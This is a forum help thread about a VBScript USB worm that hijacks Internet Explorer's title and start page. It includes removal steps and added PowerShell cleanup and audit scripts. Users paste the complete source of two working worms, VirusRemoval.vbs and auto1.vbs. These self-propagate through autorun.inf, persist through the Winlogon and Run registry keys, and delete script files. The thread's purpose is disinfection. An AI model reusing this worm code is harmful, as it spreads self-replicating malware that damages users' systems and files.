wscript.exe: is it to blame?


gsoul2soul

This is irritating as hell... trust me!!!

Well, somehow I have contracted this little "virus, or bug... or some script written by a pesky over-smart programmer". Grrrrr x(

Now the thing is, when I open IE it directs me to this site... and the IE title bar also has this "@!@#@ Holes name and all".

Now I remove the title bar "name" and also change the home page in my IE... and as soon as I restart my browser... Blast!! There you go, it appears again!!!

BUT when I kill "wscript.exe" from the Windows Task Manager it won't happen... why? what? and how do I remove this problem!!!

HELP... HELP
Mike here... desperate
 

QwertyManiac

I think I already helped you with the same problem before, or this is a false déjà vu I am experiencing...

Anyway, you're infected with the "Hacked by Godzilla" attack.

Solution's here:
*howto.redcomputer.net/windows/hacked_by_godzilla.php
 
gsoul2soul

QwertyManiac, thanks... but that file is not there, the one I should delete, the "vbs file".

Anyway, mine just says "www.sujin.com.np" in the IE title bar and tries to redirect my browser to this site... which is now down :(

help
 

QwertyManiac

The site's pretty apologetic, but I think it's nearly the same infection.

From the site (Google Cache):
If you were directed here through a virus-like program, then I would like to apologize for the problems you had to face because of me. I didn't mean to harm anyone or anyone's computer through this program. The small little script was developed to prevent your computer from any sorts of virus attacks. The script that I developed, would repair any problems in your computer that other viruses had damaged and also prevent any other viruses to enter into your computer. I am sure your computer was not infected by any viruses as long as my script was running in your computer. If you don't believe me just check the script, which is located at the system32 directory as VirusRemoval.vbs

In order to free your computer from my program, please CLICK HERE to download a program called 'Scanner'.
Run this program to free your computer from my script as well as some of the most common viruses.

Please insert your pen drives in your computer while running the program to remove the script from those drives as well

Are the other files taken care of? Any other VBS files might be deleted as well. Perform the same steps, just more flexibly :)

And yes, delete ALL VBS and autorun files from all your drives, even your externals, pen drives and phones.
 
gsoul2soul

I opened one of my pen drives... and found this "Virusremoval.vbs" and "autorun.inf".

Now I opened the VBS file in Notepad... and here is what it says:
Shall I click on it... or is it just a way of infecting more?

'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them.
'******************************************************************
'******************************************************************
'Program developed by
'Sujin Joshi
'*Sujin.com.np
'sujinjoshi@gmail.com
Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,files,Delete,auto,root

Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop


Count=Drv.DriveType

Do
If Not Fso.FileExists(SystemDir & "\VirusRemoval.vbs") then
set WriteAll = Fso.CreateTextFile(SystemDir & "\VirusRemoval.vbs",2,true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile(SystemDir & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Sujin.com.np"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","*sujin.com.np/"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\VirusRemoval.vbs"

For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
For Each files In folder.Files
auto=Left(files.Name,7)
If UCase(auto)=UCase("autorun") Then
Set Delete = Fso.DeleteFile(root & files.Name,true)
End If
Next
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"

If Fso.FileExists(Drives.Path & "\ravmon.exe") Then
Fso.DeleteFile(Drives.Path & "\ravmon.exe")
End If
If Fso.FileExists(Drives.Path & "\sxs.exe") Then
Fso.DeleteFile(Drives.Path & "\sxs.exe")
End If
If Fso.FileExists(Drives.Path & "\winfile.exe") Then
Fso.DeleteFile(Drives.Path & "\winfile.exe")
End If
If Fso.FileExists(Drives.Path & "\run.wsh") Then
Fso.DeleteFile(Drives.Path & "\run.wsh")
End If

If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
If Not Fso.FileExists(Drives.Path & "\VirusRemoval.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\VirusRemoval.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If

If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End If
End if
End If
Next

if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1

sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub
 

Yavin

First
Open Task Manager and kill the process wscript.exe.

Then
Delete the VirusRemoval.vbs and autorun.inf files from all USB drives.

Then
Go to C:\Windows\System32 and delete the file VirusRemoval.vbs. It is super hidden, so first go to Folder Options and check the "show hidden" and "show super hidden" check boxes. This is also required for the files above.

Then
Go to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
On the right side look for Shell, which should have the value of just explorer.exe.
Delete anything after explorer.exe.

Under the same key, Winlogon, also look for Userinit, which should have the value
c:\WINDOWS\system32\userinit.exe,
Delete all the crap after the comma.

Then
Go to HKCU\Software\Microsoft\Internet Explorer\Main
On the right side locate Window Title and delete its value, i.e. Sujin.com.np

Under the same key locate Start Page and delete its value, i.e. *sujin.com.np/

I think that's all, guys. I'm sure it will help.


Guys, you can also disable the use of VBS and JS files from the registry. For that,
go to HKLM\Software\Microsoft\Windows Script Host\Settings
On the right look for a REG_SZ called Enabled and change its value to 0 to turn off Windows Scripting Host. After this, even if you accidentally click on VBS or JS files, it will display the message; you can see it on your own.
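Yavin's steps, written up as one PowerShell script. This is an added example by the editor, not code from the thread or from any of the tools linked in it. It assumes Windows PowerShell 5.1 or later, an elevated prompt, and that it is run as the affected user (the IE values live under HKCU, so an elevated prompt opened under a different admin account would fix the wrong hive). The about:blank start page and the -DisableWSH switch name are my choices; everything else (paths, value names, stock values) comes from the posts above.

```powershell
# Added example (editor's code, not from the thread): Yavin's manual steps as one script.
# Assumes Windows PowerShell 5.1+, elevated, run AS THE AFFECTED USER (IE values are HKCU).
# Run with -WhatIf first to preview every change without making it.
[CmdletBinding(SupportsShouldProcess)]
param(
    [switch]$DisableWSH   # also apply Yavin's optional "turn off Windows Script Host" step
)
$ErrorActionPreference = 'Stop'

function Remove-WormFile {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$Path)
    # Get-Item needs -Force to see the file: the worm sets Attributes = -1, i.e. every
    # attribute bit at once, including Hidden and System ("super hidden" in the post).
    $f = Get-Item -LiteralPath $Path -Force -ErrorAction SilentlyContinue
    if (-not $f) { return }
    if ($PSCmdlet.ShouldProcess($Path, 'Remove')) {
        $f.Attributes = [System.IO.FileAttributes]::Normal   # clear ReadOnly/Hidden/System
        Remove-Item -LiteralPath $Path -Force
        Write-Host "Removed $Path"
    }
}

# 1. Kill the script host first: the System32 copy loops forever and re-creates
#    the files every 10 seconds (the Wscript.sleep 10000 loop in the posted script).
Get-Process -Name wscript -ErrorAction SilentlyContinue | Stop-Process -Force

# 2. USB drives. Win32_LogicalDisk DriveType 2 = removable. (The worm's own check
#    "Drives.DriveType = 1" uses FileSystemObject numbering, where 1 = removable.)
foreach ($d in Get-CimInstance -ClassName Win32_LogicalDisk -Filter 'DriveType=2') {
    foreach ($name in 'VirusRemoval.vbs', 'autorun.inf') {
        Remove-WormFile -Path (Join-Path $d.DeviceID $name)
    }
}

# 3. The copy in System32.
Remove-WormFile -Path (Join-Path $env:SystemRoot 'System32\VirusRemoval.vbs')

# 4. Winlogon: put Userinit and Shell back to their stock values, showing what was there.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$cur = Get-ItemProperty -Path $winlogon
Write-Host "Userinit was: $($cur.Userinit)"
Write-Host "Shell was:    $($cur.Shell)"
$stockUserinit = (Join-Path $env:SystemRoot 'system32\userinit.exe') + ','
if ($PSCmdlet.ShouldProcess($winlogon, 'Reset Userinit and Shell')) {
    Set-ItemProperty -Path $winlogon -Name Userinit -Value $stockUserinit
    Set-ItemProperty -Path $winlogon -Name Shell    -Value 'explorer.exe'
}

# 5. IE: drop the injected title and reset the start page (about:blank is my choice).
$ieMain = 'HKCU:\Software\Microsoft\Internet Explorer\Main'
if ($PSCmdlet.ShouldProcess($ieMain, 'Reset Window Title and Start Page')) {
    Remove-ItemProperty -Path $ieMain -Name 'Window Title' -ErrorAction SilentlyContinue
    Set-ItemProperty    -Path $ieMain -Name 'Start Page'   -Value 'about:blank'
}

# 6. Optional: disable Windows Script Host so a stray .vbs/.js cannot run at all.
#    Yavin describes a REG_SZ "0"; a REG_DWORD 0 under the same name is written here.
if ($DisableWSH -and $PSCmdlet.ShouldProcess('Windows Script Host', 'Disable')) {
    $wsh = 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings'
    if (-not (Test-Path $wsh)) { New-Item -Path $wsh -Force | Out-Null }
    Set-ItemProperty -Path $wsh -Name Enabled -Value 0 -Type DWord
}
```

Order matters: if wscript.exe is still running when you delete the files, the System32 copy writes them back and re-sets the registry values within ten seconds, which is exactly the "it appears again" behaviour the original poster described. Plug in every pen drive that has touched the machine before running step 2, or the next insertion re-infects through autorun.inf.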
 

NavinRaj

Yavin's process removes the virus, but it is a bit tedious. I found a scanner tool which easily removed the virus. It claims to remove other viruses and to re-enable the disabled Task Manager and Folder Options.

You can also try it from:

*www.kusom.edu.np/new/notices_detail.php?noticeid=13
or
*www.swiftnepal.net/


bhutanesedude

Does anyone have antivirus software which can remove this sujin.com.np? I think I have to report the case to the Cyber Crime Investigation so that whoever this Sujin is gets wrecked for life, to stop him from making such kinds of tools. This hell **** is making my system slow and I cannot even do my work efficiently.
 

saubrl

Don't you use any antivirus?
I use NOD32 with an update that is 3 months old, but even it is able to detect wscript.exe.
 

bhutanesedude

NOD32? Does it function well enough to clear this virus from every corner of our system? Or does it just take out the title and web address from our IE..... I think *www.swiftnepal.net/ has an antivirus for this problem which functions well... what do you think, my fellow users?
 

apslogin@gmail.com

How can I remove Virusremoval.vbs?


Step 1: Open My Computer
Step 2: Go to the Tools menu > Folder Options > View (tab) > uncheck "Hide extensions for known file types", check "Show hidden files and folders" and uncheck "Hide protected operating system files".
Step 3: Go to Run > c:\windows\system32\
Step 4: Search for "Virusremoval.vbs"
Step 5: Rename the file "Virusremoval.vbs" to "virusremoval"

and

Enjoy!
 

Wilhelm

I opened one of my pen drives... and found this "auto1.vbs" and "autorun.inf".

Now I opened the VBS file in Notepad... and here is what it says:
Shall I click on it... or is it just a way of infecting more?



On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)

If Mid(x, 4) = "auto1.vbs" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If

Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop

ax = fso.FileExists(win & "\auto1.vbs")

Set myFile = fso.CreateTextFile(win & "\auto1.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(win & "\auto1.vbs")
fAttr.Attributes=39

wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe1", "wscript.exe """ & win & "\auto1.vbs"""

If ax = false Then wscr.Run "wscript.exe """ & win & "\auto1.vbs"""

While (true)

Set myDrives = fso.Drives
For Each myFlashDrive In myDrives

If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then

If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
End If

Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
auFile.write "[autorun]" & vbCrLf & "open=wscript.exe auto1.vbs" & vbCrLf & "shell\Open\Command=wscript.exe auto1.vbs" & vbCrLf & "shell\Open\Default=1"
auFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=39

Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\auto1.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path & "\auto1.vbs")
fAttr.Attributes=39

End If

Next

With wscr
.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\auto1.vbs"""
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"
End With

If tf <> win & "\auto1.vbs" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If

WScript.Sleep 10000

Wend
 
The post from NavinRaj should definitely work, because this was a big issue in Nepal several years ago and the tool suggested fixed it well.
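Both scripts posted in this thread survive a reboot the same way: a registry value that launches wscript.exe on a dropped .vbs (VirusRemoval.vbs appends itself to Winlogon\Userinit; auto1.vbs registers Run\autoMe and Run\autoMe1 under HKLM), plus an autorun.inf at the root of every removable drive whose open= and shell\open\command= lines run the script again. The following read-only audit is an added example by the editor, not code from the thread or from either script's author. It enumerates exactly those locations, parses each drive's autorun.inf for launch directives, resolves the script they point at and hashes it, and lists any running wscript.exe/cscript.exe with its command line. It assumes Windows PowerShell 5.1 or later and an elevated prompt (for HKLM and System32); the function names are mine.

```powershell
# Added audit (editor's code, not from the thread). Read-only: reports, deletes nothing.
# Covers both variants above: Winlogon\Userinit (VirusRemoval.vbs) and Run\autoMe* (auto1.vbs),
# plus the autorun.inf each of them writes to drive roots.
$ErrorActionPreference = 'SilentlyContinue'

# Autostart locations the two scripts write to, plus HKCU\Run for completeness.
# Names = $null means "inspect every value under the key".
$autostart = @(
    @{ Key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'; Names = @('Userinit', 'Shell') },
    @{ Key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';          Names = $null },
    @{ Key = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';          Names = $null }
)

function Get-Sha256 {
    param([string]$Path)
    # .NET file I/O ignores the Hidden/System attributes both worms set, so no -Force is needed.
    $sha = [System.Security.Cryptography.SHA256]::Create()
    try { ([System.BitConverter]::ToString($sha.ComputeHash([System.IO.File]::ReadAllBytes($Path)))) -replace '-', '' }
    finally { $sha.Dispose() }
}

function Get-ScriptHostAutostarts {
    # One object per registry value whose data invokes wscript.exe or cscript.exe.
    foreach ($loc in $autostart) {
        $props = Get-ItemProperty -Path $loc.Key
        if (-not $props) { continue }
        $names = if ($loc.Names) { $loc.Names } else { $props.PSObject.Properties.Name -notmatch '^PS' }
        foreach ($n in $names) {
            $data = [string]$props.$n
            if ($data -match '(?i)\b[wc]script(\.exe)?\b') {
                [pscustomobject]@{ Where = "$($loc.Key)\$n"; Data = $data }
            }
        }
    }
}

function Get-AutorunLaunchers {
    # Parses autorun.inf at every drive root and returns each directive that runs something.
    foreach ($d in Get-CimInstance -ClassName Win32_LogicalDisk) {
        $inf = Join-Path $d.DeviceID 'autorun.inf'
        if (-not (Test-Path -LiteralPath $inf)) { continue }
        foreach ($line in (Get-Content -LiteralPath $inf -Force)) {
            # open=, shellexecute= and shell\<verb>\command= are the lines the shell executes;
            # shell\open=Open (a verb label) and shell\Open\Default=1 are deliberately skipped.
            if ($line -match '^\s*(open|shellexecute|shell\\[^=\\]+\\command)\s*=\s*(.+?)\s*$') {
                $directive, $cmd = $Matches[1], $Matches[2]
                $target = $null
                # Resolve the script argument of a wscript/cscript launch against the drive root,
                # which is the working directory the shell uses when it runs an autorun command.
                if ($cmd -match '(?i)^(?:"[^"]*\\)?[wc]script(?:\.exe)?"?\s+"?([^"]+?)"?$') {
                    $target = Join-Path $d.DeviceID $Matches[1]
                }
                $exists = if ($target) { [bool](Test-Path -LiteralPath $target) } else { $false }
                [pscustomobject]@{
                    Drive     = $d.DeviceID
                    Directive = $directive
                    Command   = $cmd
                    Target    = $target
                    Sha256    = if ($exists) { Get-Sha256 $target } else { $null }
                }
            }
        }
    }
}

# Fixed drop locations used by the two scripts (GetSpecialFolder(1) and (0) respectively).
$drops = @(
    (Join-Path $env:SystemRoot 'System32\VirusRemoval.vbs'),
    (Join-Path $env:SystemRoot 'auto1.vbs')
)

'== Running script hosts (command line shows which .vbs is live) =='
Get-CimInstance -ClassName Win32_Process -Filter "Name='wscript.exe' OR Name='cscript.exe'" |
    Select-Object ProcessId, CommandLine | Format-Table -AutoSize
'== Autostart entries that invoke a script host =='
Get-ScriptHostAutostarts | Format-Table -AutoSize
'== autorun.inf launch directives per drive =='
Get-AutorunLaunchers | Format-Table -AutoSize
'== Known drop locations =='
foreach ($p in $drops) {
    $f = Get-Item -LiteralPath $p -Force   # -Force: both files are marked Hidden+System
    if ($f) { '{0}  attrs={1}  sha256={2}' -f $p, $f.Attributes, (Get-Sha256 $p) }
}
```

Run it before and after any cleanup: a clean machine prints no running script hosts, no autostart entries mentioning wscript/cscript, and no autorun.inf launch directives on removable drives. The SHA-256 of each dropped copy lets you confirm the pen-drive copies and the system copy are byte-identical (both scripts write their own source text verbatim), and gives you something to submit to an antivirus vendor or compare against a sample that a scanner already detects.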
 